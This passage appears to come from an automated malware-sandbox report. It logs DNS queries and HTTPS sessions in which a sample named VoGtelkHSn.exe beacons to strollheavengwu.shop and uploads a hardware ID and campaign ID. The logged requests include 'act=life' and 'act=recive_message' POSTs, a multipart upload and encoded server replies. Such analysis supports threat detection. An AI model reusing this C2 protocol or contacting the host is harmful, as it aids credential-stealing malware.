                                                    Apr 26, 2024 05:44:04.896805048 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:04.896837950 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.570768118 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.571094036 CEST44349709172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.571197987 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.571197987 CEST49709443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.637646914 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.637691975 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.637800932 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.638317108 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.638336897 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.952519894 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.952616930 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.954346895 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.954359055 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.955374002 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:05.956712008 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.956815004 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:05.956820965 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:06.613959074 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:06.614239931 CEST44349710172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:06.614278078 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:06.614332914 CEST49710443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.286608934 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.286693096 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.286782026 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.287198067 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.287229061 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.597851992 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.597965956 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.599329948 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.599370003 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.599701881 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.600987911 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.601772070 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.601814985 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.601950884 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.601993084 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.602148056 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.602189064 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.602351904 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.602399111 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.602590084 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.602664948 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.602876902 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.602926970 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.602946997 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.602988958 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.603107929 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.603148937 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.603200912 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.603231907 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.603316069 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.644161940 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.644383907 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.644496918 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.644548893 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.644589901 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.644670963 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.644721985 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:07.644737005 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:07.644746065 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:09.631021023 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:09.631257057 CEST44349711172.67.163.209192.168.2.5
                                                    Apr 26, 2024 05:44:09.631341934 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:09.631417036 CEST49711443192.168.2.5172.67.163.209
                                                    Apr 26, 2024 05:44:09.631454945 CEST44349711172.67.163.209192.168.2.5
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 26, 2024 05:43:58.725100994 CEST5741253192.168.2.51.1.1.1
                                                    Apr 26, 2024 05:43:58.881438971 CEST53574121.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Apr 26, 2024 05:43:58.725100994 CEST192.168.2.51.1.1.10xef4cStandard query (0)strollheavengwu.shopA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Apr 26, 2024 05:43:58.881438971 CEST1.1.1.1192.168.2.50xef4cNo error (0)strollheavengwu.shop172.67.163.209A (IP address)IN (0x0001)false
                                                    Apr 26, 2024 05:43:58.881438971 CEST1.1.1.1192.168.2.50xef4cNo error (0)strollheavengwu.shop104.21.15.198A (IP address)IN (0x0001)false
                                                    • strollheavengwu.shop
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549704172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:43:59 UTC267OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:43:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-04-26 03:43:59 UTC808INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=jf736j210ujrd72kb5tn3si2fl; expires=Mon, 19-Aug-2024 21:30:38 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdSVO91mOYFpKavHsvgt5K0LAAGBGyJZZr5DUeQSCyb1wfEj32Z4V4JAoGtsw%2FWT5mXkI%2FvcVW0Y8D4JkKcG3flVNu%2Bg39pv69oBQr5nKcWYAfpINIvw7a39P415ArCqoZega0Q1vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a3925c9c2c67da-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:43:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-04-26 03:43:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549705172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:00 UTC268OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 58
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:00 UTC58OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 73 74 61 72 26 6a 3d 64 65 66 61 75 6c 74
                                                    Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--superstar&j=default
                                                    2024-04-26 03:44:00 UTC812INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=u3tvbenup47bu8hjpaj8l0ecuu; expires=Mon, 19-Aug-2024 21:30:39 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQDci4GkR1E3OqKx2ZrYiTuK1iDS34k2d7YEujnMUgzMnBo8M2pK9h%2FfLTi52N0jlyFjlq9vkEq4IxvKLe43eoKuNzT%2FAyY7%2BdvNzKTHRhGl%2FMR3LijWBwdEcPm93SL2kMf%2FpvEZxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a392633f4b74a6-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-26 03:44:00 UTC557INData Raw: 35 30 63 0d 0a 55 67 72 69 54 63 39 51 56 43 32 53 4d 55 55 6c 36 44 4e 6c 69 78 64 31 72 45 43 71 6c 73 4e 6e 69 6e 37 58 6c 71 36 37 5a 4f 67 70 41 4f 74 76 75 58 4a 75 44 61 59 64 54 79 7a 4b 51 41 43 70 4c 56 58 59 4d 74 2f 7a 37 32 32 44 58 4c 62 79 6a 49 46 45 6a 6a 4e 6d 6b 53 6a 6a 57 6c 30 50 2f 30 6c 6e 48 38 68 6f 62 34 4a 73 66 36 56 4a 69 50 4f 74 52 62 42 65 39 65 48 4c 32 51 47 51 4a 6d 2b 4d 50 71 59 2f 4f 6d 33 2f 56 44 46 45 68 56 49 57 34 44 6b 63 77 32 4b 47 6e 4d 70 75 71 42 75 74 74 4a 53 62 52 71 55 33 66 6f 4d 41 72 69 4d 2f 44 37 34 37 54 43 7a 4b 56 68 47 70 4c 56 57 4f 48 49 6a 6d 6f 68 58 72 45 36 54 4b 6a 49 45 66 74 48 42 6a 6c 69 69 39 4d 53 42 45 2f 56 38 32 65 63 6f 4a 55 37 73 6e 52 5a 78 77 31 37 54 4a 62 76 64 30 33 73
                                                    Data Ascii: 50cUgriTc9QVC2SMUUl6DNlixd1rECqlsNnin7Xlq67ZOgpAOtvuXJuDaYdTyzKQACpLVXYMt/z722DXLbyjIFEjjNmkSjjWl0P/0lnH8hob4Jsf6VJiPOtRbBe9eHL2QGQJm+MPqY/Om3/VDFEhVIW4Dkcw2KGnMpuqButtJSbRqU3foMAriM/D747TCzKVhGpLVWOHIjmohXrE6TKjIEftHBjlii9MSBE/V82ecoJU7snRZxw17TJbvd03s
                                                    2024-04-26 03:44:00 UTC742INData Raw: 52 6f 30 38 4b 4e 68 74 37 54 51 34 54 76 31 54 4e 55 2b 42 57 67 4c 37 66 68 37 44 4c 38 6a 35 71 77 72 72 48 4c 4c 2b 78 74 59 4d 6a 6a 31 6c 68 69 2b 74 63 6e 67 6e 6d 7a 68 6e 51 4a 49 52 58 36 73 31 4e 4d 73 79 7a 2f 69 33 52 39 4a 63 33 5a 2f 54 6c 32 33 49 63 67 44 72 4e 73 56 5a 58 51 2f 33 58 32 63 66 79 42 45 50 37 48 59 55 78 53 33 4c 2f 4b 6f 58 36 41 36 7a 2b 63 6e 4c 41 49 38 2b 59 6f 4d 39 70 7a 77 77 54 50 6c 59 4c 6b 4b 4e 56 55 65 6e 48 58 79 6c 59 73 2f 73 34 56 32 71 58 4a 54 35 78 39 55 4d 6e 54 41 6f 36 45 53 79 66 46 34 6b 36 54 74 4d 4c 4d 70 57 43 36 6b 74 56 59 34 6d 79 66 43 67 41 65 59 53 73 66 6a 4b 31 77 75 46 4e 6d 4b 41 4b 4b 63 36 50 6b 37 39 57 43 68 48 6a 31 77 44 37 33 6b 57 79 32 4b 47 6e 4d 70 75 71 42 75 74 74 4a 53
                                                    Data Ascii: Ro08KNht7TQ4Tv1TNU+BWgL7fh7DL8j5qwrrHLL+xtYMjj1lhi+tcngnmzhnQJIRX6s1NMsyz/i3R9Jc3Z/Tl23IcgDrNsVZXQ/3X2cfyBEP7HYUxS3L/KoX6A6z+cnLAI8+YoM9pzwwTPlYLkKNVUenHXylYs/s4V2qXJT5x9UMnTAo6ESyfF4k6TtMLMpWC6ktVY4myfCgAeYSsfjK1wuFNmKAKKc6Pk79WChHj1wD73kWy2KGnMpuqButtJS
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 33 35 64 38 0d 0a 4f 44 34 76 34 54 70 48 37 6e 6c 58 6c 6d 43 49 38 71 30 41 35 78 4b 31 2b 73 33 55 41 49 34 39 61 4a 49 70 76 7a 55 33 54 50 4e 56 49 6b 4f 4b 55 41 4c 73 63 52 2f 4b 4c 73 65 30 37 32 32 44 64 2f 58 7a 31 4a 6c 65 79 48 42 48 6c 79 47 37 4f 53 4a 49 34 45 49 64 42 62 39 53 43 65 64 79 41 59 35 4b 6f 2b 76 76 62 59 4d 46 33 5a 2b 6e 6d 51 47 47 63 44 44 43 62 36 51 67 4a 45 76 32 57 43 78 56 6d 46 73 44 36 48 51 51 77 53 50 44 38 61 30 50 34 78 69 6e 2f 4d 58 61 46 49 34 77 59 34 6f 70 37 58 78 65 4a 4a 73 54 49 46 2f 4b 43 55 57 70 55 52 72 65 4c 73 50 69 70 68 58 64 48 37 76 36 79 38 39 47 34 6c 74 33 7a 6b 66 47 4b 31 34 6b 6d 78 4d 67 53 38 6f 4a 52 61 6c 36 47 4d 45 71 79 50 57 6c 43 4f 77 64 75 50 6a 46 32 67 71 47 4f 47 57 4d 4b
                                                    Data Ascii: 35d8OD4v4TpH7nlXlmCI8q0A5xK1+s3UAI49aJIpvzU3TPNVIkOKUALscR/KLse0722Dd/Xz1JleyHBHlyG7OSJI4EIdBb9SCedyAY5Ko+vvbYMF3Z+nmQGGcDDCb6QgJEv2WCxVmFsD6HQQwSPD8a0P4xin/MXaFI4wY4op7XxeJJsTIF/KCUWpURreLsPiphXdH7v6y89G4lt3zkfGK14kmxMgS8oJRal6GMEqyPWlCOwduPjF2gqGOGWMK
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 45 2f 42 45 53 52 49 52 66 41 50 38 31 66 36 55 39 68 70 7a 4b 48 49 42 33 33 72 54 4c 31 55 62 53 63 69 69 50 4c 71 41 34 50 55 48 38 55 69 64 44 69 56 73 48 35 6e 41 52 78 69 76 49 35 71 59 4b 36 52 32 2b 2f 38 48 58 41 34 73 31 62 38 42 68 78 56 6c 64 44 2f 64 4c 5a 78 2f 49 45 53 72 41 54 31 65 6d 53 64 65 36 79 57 37 78 64 4e 36 66 6a 4e 34 4b 79 6d 67 71 77 43 75 6e 4d 6a 74 46 2b 31 77 6b 51 49 52 52 43 75 4e 6e 48 38 34 69 78 76 4b 67 43 65 30 64 75 66 66 65 31 51 43 48 4e 6d 43 53 62 2b 4e 61 58 53 53 77 56 44 38 48 30 68 4e 48 79 58 34 62 7a 53 37 4a 38 2b 4d 6b 34 68 2b 2b 2b 49 37 73 42 59 51 2b 62 35 5a 76 78 56 6b 70 41 5a 67 34 50 69 2f 68 4f 6b 66 75 65 56 65 57 59 49 6a 77 70 51 6e 6f 47 37 76 77 79 74 51 42 67 54 31 69 68 79 4f 6b 4f 6a
                                                    Data Ascii: E/BESRIRfAP81f6U9hpzKHIB33rTL1UbSciiPLqA4PUH8UidDiVsH5nARxivI5qYK6R2+/8HXA4s1b8BhxVldD/dLZx/IESrAT1emSde6yW7xdN6fjN4KymgqwCunMjtF+1wkQIRRCuNnH84ixvKgCe0duffe1QCHNmCSb+NaXSSwVD8H0hNHyX4bzS7J8+Mk4h+++I7sBYQ+b5ZvxVkpAZg4Pi/hOkfueVeWYIjwpQnoG7vwytQBgT1ihyOkOj
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 4a 6b 4f 47 57 77 48 71 64 68 6a 42 4c 63 43 30 37 32 32 44 64 2f 58 7a 31 4a 6c 65 79 48 42 4e 6c 79 53 6a 4e 48 59 6e 6d 30 78 70 4c 2b 46 49 62 34 49 65 56 38 6b 75 69 4b 7a 6a 52 65 51 56 73 2f 4c 4a 31 51 65 4d 4f 47 32 49 4b 36 77 30 4d 45 7a 2f 56 79 4a 47 68 56 55 4c 35 33 38 57 7a 79 37 44 2b 36 6f 41 71 46 4c 64 6e 36 65 5a 41 5a 4a 77 4d 4d 4a 76 6e 44 45 67 57 4f 42 66 5a 79 2f 68 54 6b 6d 42 48 67 36 6d 53 61 4f 30 70 67 6d 6f 52 50 65 30 7a 63 73 4d 67 44 35 74 6a 79 71 75 50 54 46 43 39 6c 38 74 54 6f 4a 58 43 4f 42 6e 46 4d 49 73 7a 2f 71 74 43 2b 55 57 74 76 6d 4d 6c 32 37 68 57 79 69 48 4e 2b 31 71 64 41 2f 63 56 43 70 70 67 56 30 41 71 52 31 38 30 57 79 67 6e 37 68 74 67 33 66 31 38 38 43 5a 58 73 68 77 5a 49 6f 6a 70 44 49 2f 53 76 68
                                                    Data Ascii: JkOGWwHqdhjBLcC0722Dd/Xz1JleyHBNlySjNHYnm0xpL+FIb4IeV8kuiKzjReQVs/LJ1QeMOG2IK6w0MEz/VyJGhVUL538Wzy7D+6oAqFLdn6eZAZJwMMJvnDEgWOBfZy/hTkmBHg6mSaO0pgmoRPe0zcsMgD5tjyquPTFC9l8tToJXCOBnFMIsz/qtC+UWtvmMl27hWyiHN+1qdA/cVCppgV0AqR180Wygn7htg3f188CZXshwZIojpDI/Svh
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 56 34 56 36 48 6f 65 79 53 6e 46 2b 36 38 41 35 67 36 79 2f 38 66 52 44 34 51 32 4b 4d 35 48 78 6c 6c 32 53 4f 67 54 66 77 58 4b 5a 77 54 6e 66 67 62 42 49 63 53 30 79 57 37 33 55 74 32 66 31 62 46 74 34 58 42 76 6a 47 2f 31 63 48 5a 44 2f 6c 4d 6f 53 34 5a 61 44 2b 68 35 47 63 6b 6e 77 66 79 70 46 2b 6b 59 76 66 58 43 31 67 65 4f 4e 57 32 45 4b 4b 6b 30 4f 51 2b 2b 4f 30 77 73 79 6c 59 66 71 53 31 56 6a 67 33 50 34 59 41 2f 71 48 54 65 36 34 4b 78 62 5a 4e 59 41 2b 74 76 71 6a 35 32 46 37 49 54 4c 55 79 4f 55 67 50 73 65 68 62 50 4a 4e 72 7a 71 42 66 6d 45 62 72 38 78 4e 41 48 6a 6a 56 6c 68 69 4f 6e 4d 7a 46 42 2f 6c 74 6e 43 65 49 36 62 4b 6c 79 44 34 35 36 69 72 53 41 46 66 4d 4f 6f 2f 6e 74 31 41 6e 4b 57 41 4f 66 59 63 56 5a 4c 79 65 62 4f 47 64 41
                                                    Data Ascii: V4V6HoeySnF+68A5g6y/8fRD4Q2KM5Hxll2SOgTfwXKZwTnfgbBIcS0yW73Ut2f1bFt4XBvjG/1cHZD/lMoS4ZaD+h5GcknwfypF+kYvfXC1geONW2EKKk0OQ++O0wsylYfqS1Vjg3P4YA/qHTe64KxbZNYA+tvqj52F7ITLUyOUgPsehbPJNrzqBfmEbr8xNAHjjVlhiOnMzFB/ltnCeI6bKlyD456irSAFfMOo/nt1AnKWAOfYcVZLyebOGdA
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 42 31 45 38 51 76 7a 2f 53 6b 43 4f 30 59 75 2f 44 4c 32 51 71 46 4e 32 43 50 4b 36 30 39 64 67 47 59 4f 45 77 48 6a 55 6c 48 73 54 64 58 37 69 6e 65 31 61 38 4f 2b 6c 7a 64 6e 39 4f 58 62 75 45 70 41 4f 74 45 37 54 55 36 44 36 67 52 5a 30 6d 44 55 41 2f 6e 65 52 2f 4b 4d 4d 6a 2f 71 41 72 70 45 37 58 33 7a 64 4d 4f 6d 44 5a 6f 69 79 65 71 4f 6a 4a 42 34 6c 49 6f 42 38 51 35 62 49 49 31 45 4e 5a 69 6b 4c 62 68 4e 50 34 62 73 76 75 4f 38 41 47 52 4d 57 4b 44 4a 4b 46 79 58 69 54 76 48 55 38 73 6b 7a 6c 73 67 6a 55 51 77 6d 4b 51 74 75 45 49 35 42 47 78 35 73 44 5a 42 6f 4d 33 59 70 49 67 6f 6a 38 31 54 2f 56 42 4a 6c 57 46 57 67 4c 71 63 52 6a 42 4c 73 44 2b 34 55 75 41 64 39 36 30 79 38 46 47 30 6e 49 6f 72 43 79 38 4f 48 52 6f 36 6b 55 67 53 35 74 61 43
                                                    Data Ascii: B1E8Qvz/SkCO0Yu/DL2QqFN2CPK609dgGYOEwHjUlHsTdX7ine1a8O+lzdn9OXbuEpAOtE7TU6D6gRZ0mDUA/neR/KMMj/qArpE7X3zdMOmDZoiyeqOjJB4lIoB8Q5bII1ENZikLbhNP4bsvuO8AGRMWKDJKFyXiTvHU8skzlsgjUQwmKQtuEI5BGx5sDZBoM3YpIgoj81T/VBJlWFWgLqcRjBLsD+4UuAd960y8FG0nIorCy8OHRo6kUgS5taC
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 4f 41 64 2f 69 71 78 36 6f 64 4e 37 72 67 72 46 74 6b 31 67 44 36 32 2b 71 50 6e 59 58 73 68 4d 71 51 49 52 5a 41 65 64 7a 42 63 49 74 7a 76 53 67 44 2b 55 51 76 76 50 43 30 67 43 50 50 57 69 47 4b 61 6b 32 4d 6b 48 7a 45 32 6b 76 34 54 70 48 37 6d 31 58 6c 6d 43 49 30 34 77 30 71 6a 2b 69 34 73 62 65 43 70 77 37 61 59 4d 35 6f 43 4a 32 4a 35 74 4d 61 53 2f 68 53 47 2b 43 48 6c 66 4a 4c 6f 69 73 34 30 58 6a 45 72 44 31 77 4e 4d 42 68 43 4a 70 69 69 4f 73 4e 54 46 45 34 6c 67 31 54 49 4a 53 43 65 46 38 46 38 41 69 79 66 6d 68 52 61 5a 30 33 70 2b 4d 33 68 37 4b 61 43 72 41 43 6f 34 6c 49 45 57 79 63 44 42 52 67 46 59 4c 2f 33 34 57 7a 54 54 46 35 4f 46 74 67 77 50 37 6e 4b 66 41 62 75 46 62 4b 49 63 6a 37 57 70 30 44 2f 74 63 4b 55 71 42 56 51 37 73 66 52
                                                    Data Ascii: OAd/iqx6odN7rgrFtk1gD62+qPnYXshMqQIRZAedzBcItzvSgD+UQvvPC0gCPPWiGKak2MkHzE2kv4TpH7m1XlmCI04w0qj+i4sbeCpw7aYM5oCJ2J5tMaS/hSG+CHlfJLois40XjErD1wNMBhCJpiiOsNTFE4lg1TIJSCeF8F8AiyfmhRaZ03p+M3h7KaCrACo4lIEWycDBRgFYL/34WzTTF5OFtgwP7nKfAbuFbKIcj7Wp0D/tcKUqBVQ7sfR
                                                    2024-04-26 03:44:00 UTC1369INData Raw: 38 4c 42 46 73 46 37 6c 70 70 65 4d 56 64 31 67 4f 75 68 45 73 6e 78 65 4a 4f 6b 37 54 43 7a 4b 52 30 65 78 4e 30 57 41 53 71 4f 66 34 52 65 6f 52 50 65 30 69 39 63 4c 69 7a 4e 6d 67 7a 32 2f 4e 44 56 5a 38 78 51 5a 65 61 74 63 44 4f 56 34 47 4d 55 63 39 74 57 73 44 75 51 52 75 76 2f 79 35 78 4f 4a 50 6d 61 48 4f 62 78 79 65 43 65 62 4f 47 64 49 79 67 6c 46 30 44 56 66 6a 68 32 47 6e 4d 70 75 71 41 54 31 72 49 36 5a 4d 34 6b 2b 5a 6f 63 35 76 48 38 58 51 76 74 66 4b 6b 69 42 45 55 6d 42 48 6e 79 4f 4a 49 69 73 34 31 57 6d 64 4e 36 66 6a 4e 30 58 79 6d 67 71 30 48 33 32 5a 32 55 59 6f 41 46 50 4c 4a 55 66 62 34 4a 73 66 36 56 4a 69 4f 4c 68 58 61 70 4f 2b 35 79 6e 73 6b 61 59 63 44 44 43 62 2b 6f 78 4a 46 33 32 55 44 46 45 7a 57 38 35 79 6d 49 42 78 44 6d
                                                    Data Ascii: 8LBFsF7lppeMVd1gOuhEsnxeJOk7TCzKR0exN0WASqOf4ReoRPe0i9cLizNmgz2/NDVZ8xQZeatcDOV4GMUc9tWsDuQRuv/y5xOJPmaHObxyeCebOGdIyglF0DVfjh2GnMpuqAT1rI6ZM4k+Zoc5vH8XQvtfKkiBEUmBHnyOJIis41WmdN6fjN0Xymgq0H32Z2UYoAFPLJUfb4Jsf6VJiOLhXapO+5ynskaYcDDCb+oxJF32UDFEzW85ymIBxDm


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549706172.67.163.2094435444C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-26 03:44:01 UTC286OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 12839
                                                    Host: strollheavengwu.shop
                                                    2024-04-26 03:44:01 UTC12839OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 31 46 37 43 38 46 42 32 42 32 34 34 39 45 35 35 38 44 35 38 41 39 39 32 39 42 38 37 41 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"011F7C8FB2B2449E558D58A9929B87A0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                    2024-04-26 03:44:01 UTC804INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=bc3ev56gsb6rgo2ev5fr25trv5; expires=Mon, 19-Aug-2024 21:30:40 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
